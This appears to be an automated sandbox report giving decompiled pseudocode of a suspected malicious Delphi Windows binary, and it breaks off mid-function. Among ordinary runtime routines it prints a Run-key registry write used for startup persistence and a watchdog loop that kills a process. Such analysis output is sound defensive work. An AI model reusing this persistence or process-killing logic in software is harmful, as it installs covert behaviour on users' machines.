    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t75 = 0x40a49c;
				_t89 = 0x40a49c;
				_t85 =  *0x406188; // 0x4061d4
				if(E004032A0(_t92, _t85) != 0) {
					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00407764(_t75, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00407764(_v8, _t89);
			}































    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00402F8C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
    C-Code - Quality: 65%
    			E00402F8C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x419020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x419020; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x419020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402FFD);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x403004);
					return RegCloseKey(_v8);
				}
			}












    0x00402f8d
    0x00402f8f
    0x00402f99
    0x00402fb5
    0x00403004
    0x00403016
    0x00403019
    0x00403022
    0x00402fb7
    0x00402fb9
    0x00402fba
    0x00402fbf
    0x00402fc2
    0x00402fc5
    0x00402fe1
    0x00402fe8
    0x00402feb
    0x00402fee
    0x00402ffc
    0x00402ffc

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040A038, Relevance: 7.6, APIs: 5, Instructions: 50
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40a0cf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
				_t29 = E00407174(0x40a0e4, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x454764;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040A0D6);
				return E00403E88( &_v8);
			}










    0x0040a038
    0x0040a03b
    0x0040a040
    0x0040a041
    0x0040a046
    0x0040a049
    0x0040a05f
    0x0040a071
    0x0040a07b
    0x0040a08b
    0x0040a090
    0x0040a095
    0x0040a09a
    0x0040a09a
    0x0040a0a0
    0x0040a0a3
    0x0040a0a3
    0x0040a0b4
    0x0040a0b4
    0x0040a0bb
    0x0040a0be
    0x0040a0c1
    0x0040a0ce

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040A0E8, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40a2b2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00403E88(__edx);
				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404148(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x419108], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404150(_t122, 0x40a30c);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404070();
												E00404150(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404150(_t122, 0x40a300);
										_t92 = _t92 + 1;
									}
								} else {
									E00404150(_t122, 0x40a2ec);
									_t92 = _t92 + 3;
								}
							} else {
								E00404150(_t122, 0x40a2d8);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040B04C(_t124, _t92);
							E004043A8(_t124, _v8, _t92,  &_v20);
							E00404150(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x45473c; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00403EDC(_t122, _t124);
					} else {
						while(_t92 <= E00404148(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404070();
									E00404150(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040A2B9);
				return E00403EAC( &_v24, 4);
			}























    0x0040a0e8
    0x0040a0ed
    0x0040a0ee
    0x0040a0ef
    0x0040a0f0
    0x0040a0f1
    0x0040a0f5
    0x0040a0f7
    0x0040a0fb
    0x0040a0fc
    0x0040a101
    0x0040a104
    0x0040a107
    0x0040a10e
    0x0040a126
    0x0040a13e
    0x0040a288
    0x0040a28a
    0x0040a28f
    0x0040a291
    0x00000000
    0x00000000
    0x0040a1a7
    0x0040a1ac
    0x0040a1b3
    0x0040a1f1
    0x0040a1f6
    0x0040a1f8
    0x0040a217
    0x0040a21c
    0x0040a21e
    0x0040a23f
    0x0040a244
    0x0040a246
    0x0040a25b
    0x0040a25b
    0x0040a25d
    0x0040a263
    0x0040a26a
    0x0040a25f
    0x0040a25f
    0x0040a261
    0x0040a278
    0x0040a282
    0x00000000
    0x00000000
    0x00000000
    0x0040a261
    0x0040a248
    0x0040a24f
    0x0040a254
    0x0040a254
    0x0040a220
    0x0040a227
    0x0040a22c
    0x0040a22c
    0x0040a1fa
    0x0040a201
    0x0040a206
    0x0040a206
    0x0040a287
    0x0040a287
    0x0040a1b5
    0x0040a1be
    0x0040a1cc
    0x0040a1d6
    0x0040a1db
    0x0040a1db
    0x0040a1b3
    0x0040a144
    0x0040a144
    0x0040a149
    0x0040a14c
    0x0040a15a
    0x0040a156
    0x0040a156
    0x0040a156
    0x0040a15e
    0x0040a199
    0x0040a160
    0x0040a185
    0x0040a166
    0x0040a166
    0x0040a168
    0x0040a16a
    0x0040a16c
    0x0040a175
    0x0040a17f
    0x0040a17f
    0x0040a16c
    0x0040a184
    0x0040a184
    0x0040a184
    0x0040a190
    0x0040a15e
    0x0040a297
    0x0040a299
    0x0040a29c
    0x0040a29f
    0x0040a2b1

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0041763C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				void* _t22;
				void* _t35;
				intOrPtr* _t38;
				void* _t47;

				_t47 = __ecx;
				_t38 = __edx;
				E00403E88(__ecx);
				if(_t38 == 0) {
					return E00403EDC(_t47, "0.0.0.0");
				}
				if( *_t38 + 0xd0 - 0xa >= 0) {
					_t22 = E00404348(_t38);
					_push(_t22);
					L0040C4F8();
					if(_t22 != 0) {
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						_v24 = 0;
						_v20 = 0;
						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
					}
				} else {
					_t35 = E00404348(_t38);
					_push(_t35);
					L0040C4C8();
					_t22 = _t35 + 1;
					if(_t22 != 0) {
						return E00403EDC(_t47, _t38);
					}
				}
				return _t22;
			}















    0x00417642
    0x00417644
    0x00417648
    0x0041764f
    0x00000000
    0x004176e4
    0x0041765b
    0x0041767a
    0x0041767f
    0x00417680
    0x00417687
    0x00417695
    0x00417699
    0x004176a3
    0x004176a7
    0x004176b1
    0x004176b5
    0x004176bf
    0x004176c3
    0x00000000
    0x004176d6
    0x0041765d
    0x0041765f
    0x00417664
    0x00417665
    0x0041766a
    0x0041766b
    0x00000000
    0x00417671
    0x0041766b
    0x004176ef

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 004185E8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				char _v20;
				int _t28;
				char* _t41;
				intOrPtr _t47;
				void* _t51;

				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t51);
				_push(0x418692);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff0;
				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
				_t41 = E00404348(_v12);
				E00404080( &_v20, _t41);
				_t28 = E00404148(_v20);
				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
				RegCloseKey(_v16);
				_pop(_t47);
				 *[fs:eax] = _t47;
				_push(E00418699);
				E00403E88( &_v20);
				return E00403EAC( &_v12, 2);
			}











    0x004185f1
    0x004185f4
    0x004185f7
    0x004185fd
    0x00418605
    0x0041860c
    0x0041860d
    0x00418612
    0x00418615
    0x0041862d
    0x0041863a
    0x00418641
    0x00418649
    0x00418661
    0x0041866a
    0x00418671
    0x00418674
    0x00418677
    0x0041867f
    0x00418691

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00418B04, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
    C-Code - Quality: 72%
    			E00418B04() {
				char _v8;
				intOrPtr* _t3;
				long _t13;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t26;

				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
				_push(0);
				_t26 = 0;
				_push(_t24);
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				L2:
				E00403F20( &_v8,  *0x454a5c);
				E00418A14(0x454a5c, _t20, _t21);
				E00404294(_v8,  *0x454a5c);
				if(_t26 != 0) {
					_t26 = E00418560(_t26);
					if(_t26 == 0) {
						_t13 =  *0x454a60; // 0x0
						TerminateProcess(OpenProcess(1, 0, _t13), 0);
					}
				}
				Sleep("h N");
				goto L2;
			}










    0x00418b06
    0x00418b0f
    0x00418b17
    0x00418b19
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00000000

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00418B0C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
    C-Code - Quality: 75%
    			E00418B0C() {
				char _v8;
				long _t10;
				void* _t17;
				void* _t18;
				intOrPtr _t20;
				void* _t21;

				_push(0);
				_t21 = 0;
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				while(1) {
					E00403F20( &_v8,  *0x454a5c);
					E00418A14(0x454a5c, _t17, _t18);
					E00404294(_v8,  *0x454a5c);
					if(_t21 != 0) {
						_t21 = E00418560(_t21);
						if(_t21 == 0) {
							_t10 =  *0x454a60; // 0x0
							TerminateProcess(OpenProcess(1, 0, _t10), 0);
						}
					}
					Sleep("h N");
				}
			}









    0x00418b0f
    0x00418b17
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00418b65

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 0040BAA0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
    C-Code - Quality: 100%
    			E0040BAA0() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x41912c = _t1;
				}
				if( *0x41912c == 0) {
					 *0x41912c = E004076D4;
					return E004076D4;
				}
				return _t1;
			}





    0x0040baa6
    0x0040baab
    0x0040baaf
    0x0040bab7
    0x0040babc
    0x0040babc
    0x0040bac8
    0x0040bacf
    0x00000000
    0x0040bacf
    0x0040bad5

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    Function 00409161, Relevance: 6.4, Strings: 5, Instructions: 128
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
				signed int _t166;
				signed int _t168;
				signed int _t170;
				signed int _t172;
				signed int _t181;
				void* _t183;
				intOrPtr _t224;
				intOrPtr _t227;
				signed int _t232;
				void* _t250;
				void* _t252;
				intOrPtr _t272;
				signed int _t281;
				void* _t282;

				L0:
				while(1) {
					L0:
					E004089D8(_t282);
					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
					if(E004077C0(_t281, 5, 0x409418) != 0) {
						_t166 = E004077C0(_t281, 3, 0x409420);
						__eflags = _t166;
						if(_t166 != 0) {
							_t168 = E004077C0(_t281, 4, 0x409424);
							__eflags = _t168;
							if(_t168 != 0) {
								_t170 = E004077C0(_t281, 4, 0x40942c);
								__eflags = _t170;
								if(_t170 != 0) {
									_t172 = E004077C0(_t281, 3, 0x409434);
									__eflags = _t172;
									if(_t172 != 0) {
										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									} else {
										E004089A0(_t282);
										_pop(_t250);
										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
									}
								} else {
									E004089A0(_t282);
									_pop(_t252);
									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								}
							} else {
								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
								if( *((short*)(_t282 - 0x16)) >= 0xc) {
									_t224 =  *0x454694; // 0x0
									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
								} else {
									_t227 =  *0x454690; // 0x0
									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
								}
								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								 *((char*)(_t282 - 0x1e)) = 1;
							}
						} else {
							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
							if( *((short*)(_t282 - 0x16)) >= 0xc) {
								__eflags = _t281;
							}
							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
							 *((char*)(_t282 - 0x1e)) = 1;
						}
					} else {
						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
						if( *((short*)(__ebp - 0x16)) >= 0xc) {
							__esi = __esi + 3;
							__eflags = __esi;
						}
						__eax =  *(__ebp + 8);
						__edx = 2;
						__eax = __esi;
						__eax = E004088C4(2,  *(__ebp + 8));
						 *(__ebp - 4) =  *(__ebp - 4) + 4;
						 *((char*)(__ebp - 0x1e)) = 1;
					}
					while(1) {
						L109:
						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
						if(_t164 == 0) {
							break;
						}
						L1:
						 *(_t282 - 5) = _t164;
						asm("bt [0x419108], eax");
						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t181 =  *(_t282 - 5);
							__eflags = _t181 + 0x9f - 0x1a;
							if(_t181 + 0x9f - 0x1a < 0) {
								_t181 = _t181 - 0x20;
								__eflags = _t181;
							}
							L5:
							__eflags = _t181 + 0xbf - 0x1a;
							if(_t181 + 0xbf - 0x1a >= 0) {
								L10:
								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
								__eflags = _t183 - 0x38;
								if(_t183 > 0x38) {
									L108:
									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									continue;
								}
								L11:
								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
									case 0:
										goto L108;
									case 1:
										L12:
										E00408974(_t282);
										E004089A0(_t282);
										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
										} else {
											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
										}
										goto L109;
									case 2:
										L15:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x24;
										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
										__eax =  *(__ebp - 0x24);
										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
										goto L109;
									case 3:
										L16:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x28;
										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
										__eax =  *(__ebp - 0x28);
										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
										goto L109;
									case 4:
										L17:
										E00408974(__ebp) = E004089A0(__ebp);
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
										if(__eflags < 0) {
											__eax =  *(__ebp + 8);
											__eax =  *(__ebp - 0x10) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
											} else {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											}
										}
										goto L109;
									case 5:
										L23:
										E00408974(__ebp) =  *(__ebp - 0xc);
										__eax =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags = __eax;
										if(__eflags < 0) {
											E004089A0(__ebp) =  *(__ebp + 8);
											__eax =  *(__ebp - 0x12) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
